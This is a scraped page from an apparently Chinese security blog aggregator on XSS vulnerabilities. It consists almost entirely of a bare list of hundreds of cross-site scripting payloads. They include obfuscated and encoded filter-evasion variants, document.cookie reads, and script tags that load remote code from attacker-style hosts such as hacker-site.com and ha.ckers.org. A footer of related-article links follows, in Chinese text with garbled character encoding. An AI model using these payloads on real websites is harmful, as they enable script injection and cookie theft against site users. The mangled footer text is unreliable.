<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover= javascript:alert(1) >X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=<!-- > alert (1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover= prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe// src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<iframe src=j a v a s c r i p t :a l e r t %28 1 %29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:>click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!--> (1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>// confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=jaa:a(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=data:text/javascript,alert(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:>click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>">Click Me</a>
'';!--"<XSS>=&{()}
'>//\\,<'>">">"*"
'); alert('XSS
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<font style='color:expression(alert(document.cookie))'>
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
<body onunload="javascript:alert('XSS');">
<body onLoad="alert('XSS');"
[color=red' onmouseover="alert('xss')"]mouse over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("Bonjour !");
<div style="x:expression((window.r==1)?'':eval('r=1;
alert(String.fromCharCode(88,83,83));'))">
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'">><marquee><h1>XSS</h1></marquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript"> alert('X \nS \nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.site.com/XSS.js'></script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
<SCRIPT>document.write("XSS");</SCRIPT>
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='><script>alert("xss")</script>
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
src="http://www.site.com/XSS.js"></script>
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
!--" /><script>alert('xss');</script>
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
'); alert('xss'); var x='
\\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>
</body>
</html>
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
<SCRIPT> alert(??????XSS??????); </SCRIPT>
<BODY ONLOAD=alert("XSS")>
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG SRC="javascript:alert('XSS');">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IFRAME SRC=??????http://hacker-site.com/xss.html??????>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<TABLE BACKGROUND="javascript:alert('XSS')">
<TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<INPUT TYPE="BUTTON" action="alert('XSS')"/>
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>
><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
<iframe src=http://xss.rocks/scriptlet.html <
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<iframe src=" javascript:prompt(1) ">
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=`` onerror=alert(1)

到了這里，關(guān)于【網(wǎng)絡(luò)安全---XSS漏洞（1）】XSS漏洞原理，產(chǎn)生原因，以及XSS漏洞的分類。附帶案例和payload讓你快速學(xué)習(xí)XSS漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容，請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來自互聯(lián)網(wǎng)用戶投稿，該文觀點(diǎn)僅代表作者本人，不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符，請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋，一經(jīng)查實(shí)，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

2023 年網(wǎng)絡(luò)安全漏洞的主要原因
? 網(wǎng)絡(luò)安全漏洞已經(jīng)并將繼續(xù)成為企業(yè)面臨的主要問題。因此，對于企業(yè)領(lǐng)導(dǎo)者來說，了解這些違規(guī)行為的原因至關(guān)重要，這樣他們才能更好地保護(hù)他們的數(shù)據(jù)。在這篇博文中，我們將概述 2023 年比較普遍的網(wǎng)絡(luò)安全漏洞的主要原因。 ? 云安全缺陷隨著越來越多的企業(yè)將數(shù)
2023年04月23日
瀏覽(29)
【網(wǎng)絡(luò)安全 --- xss-labs靶場通關(guān)（1-10關(guān)）】詳細(xì)的xss-labs靶場通關(guān)思路及技巧講解，讓你對xss漏洞的理解更深刻
靶場安裝請參考以下博客，既詳細(xì)有提供工具：【網(wǎng)絡(luò)安全 --- xss-labs靶場】xss-labs靶場安裝詳細(xì)教程，讓你鞏固對xss漏洞的理解及繞過技巧和方法（提供資源）-CSDN博客【網(wǎng)絡(luò)安全 --- xss-labs通關(guān)】xss-labs靶場通關(guān)，讓你鞏固對xss漏洞的理解及繞過技巧和方法（提供資源） h
2024年02月08日
瀏覽(23)
信息安全-網(wǎng)絡(luò)安全漏洞防護(hù)技術(shù)原理與應(yīng)用
網(wǎng)絡(luò)安全漏洞：又稱為脆弱性，簡稱漏洞。漏洞一般是致使網(wǎng)絡(luò)信息系統(tǒng)安全策略相沖突的缺陷，這種缺陷通常稱為安全隱患安全漏洞的影響：主要有機(jī)密性受損、完整性破壞、可用性降低、抗抵賴性缺失、可控制性下降、真實(shí)性不保等根據(jù)已經(jīng)公開的漏洞信息，網(wǎng)絡(luò)
2024年02月11日
瀏覽(59)
【網(wǎng)絡(luò)安全】CVE漏洞分析以及復(fù)現(xiàn)
漏洞詳情 Shiro 在路徑控制的時(shí)候，未能對傳入的 url 編碼進(jìn)行 decode 解碼，導(dǎo)致攻擊者可以繞過過濾器，訪問被過濾的路徑。漏洞影響版本 Shiro 1.0.0-incubating 對應(yīng) Maven Repo 里面也有【一一幫助安全學(xué)習(xí)，所有資源獲取一一】 ①網(wǎng)絡(luò)安全學(xué)習(xí)路線 ②20份滲透測試電子書 ③安全
2024年02月06日
瀏覽(28)
【網(wǎng)絡(luò)安全】「漏洞原理」（一）SQL 注入漏洞之概念介紹
嚴(yán)正聲明：本博文所討論的技術(shù)僅用于研究學(xué)習(xí)，旨在增強(qiáng)讀者的信息安全意識(shí)，提高信息安全防護(hù)技能，嚴(yán)禁用于非法活動(dòng)。任何個(gè)人、團(tuán)體、組織不得用于非法目的，違法犯罪必將受到法律的嚴(yán)厲制裁。 SQL 注入（SQL Injection）是一種常見的網(wǎng)絡(luò)攻擊技術(shù)，它利用應(yīng)用程序
2024年02月06日
瀏覽(21)
【網(wǎng)絡(luò)安全】「漏洞原理」（二）SQL 注入漏洞之理論講解
嚴(yán)正聲明：本博文所討論的技術(shù)僅用于研究學(xué)習(xí)，旨在增強(qiáng)讀者的信息安全意識(shí)，提高信息安全防護(hù)技能，嚴(yán)禁用于非法活動(dòng)。任何個(gè)人、團(tuán)體、組織不得用于非法目的，違法犯罪必將受到法律的嚴(yán)厲制裁。【點(diǎn)擊此處即可獲取282G網(wǎng)絡(luò)安全零基礎(chǔ)入門學(xué)習(xí)資源】信息搜集在
2024年02月06日
瀏覽(31)
【網(wǎng)絡(luò)安全篇】php偽協(xié)議-漏洞及其原理
??今日學(xué)習(xí)目標(biāo)： ??學(xué)習(xí)php偽協(xié)議 ?創(chuàng)作者：賢魚 ?預(yù)計(jì)時(shí)間：35分鐘 ??個(gè)人主頁：賢魚的個(gè)人主頁 ??專欄系列：網(wǎng)絡(luò)安全 ??賢魚的個(gè)人社區(qū)，歡迎你的加入賢魚擺爛團(tuán) ??如果有需要可以查看下面文章 25分鐘了解php？php基礎(chǔ) 舉個(gè)例子 include(文件名) ; 作用是如果文件
2024年02月03日
瀏覽(22)
網(wǎng)絡(luò)安全-kkFileViews任意文件讀取漏洞原理解析
在學(xué)習(xí)的過程中，了解到kkFileView存在任意文件讀取、SSRF、文件上傳漏洞。為了更深刻的理解其原理，我從git拉取了項(xiàng)目，由于該漏洞在最新版本已經(jīng)修復(fù)，所以這只是歷史版本中存在的。寫這篇文章來提醒自己代碼中容易出問題的地方。來到kkFileView官網(wǎng)，發(fā)現(xiàn)支持Gitee，
2024年04月11日
瀏覽(25)
網(wǎng)絡(luò)安全--linux下Nginx安裝以及docker驗(yàn)證標(biāo)簽漏洞
目錄一、Nginx安裝 ?二、docker驗(yàn)證標(biāo)簽漏洞 1.首先創(chuàng)建 Nginx 的目錄并進(jìn)入： 2.下載 Nginx 的安裝包，可以通過 FTP 工具上傳離線環(huán)境包，也可通過 wget 命令在線獲取安裝包：沒有 wget 命令的可通過 yum 命令安裝： 3.解壓 Nginx 的壓縮包： 4.下載并安裝 Nginx 所需的依賴庫和包：
2024年02月11日
瀏覽(21)
Web網(wǎng)絡(luò)安全-----Log4j高危漏洞原理及修復(fù)
Web網(wǎng)絡(luò)安全-----紅藍(lán)攻防之信息收集 Log4j 即 log for java(java的日志) ，是Apache的一個(gè)開源項(xiàng)目，通過使用Log4j，我們可以控制日志信息輸送的目的地是控制臺(tái)、文件、GUI組件，甚至是套接口服務(wù)器、NT的事件記錄器、UNIX Syslog守護(hù)進(jìn)程等；我們也可以控制每一條日志的輸出格式；
2024年02月10日
瀏覽(23)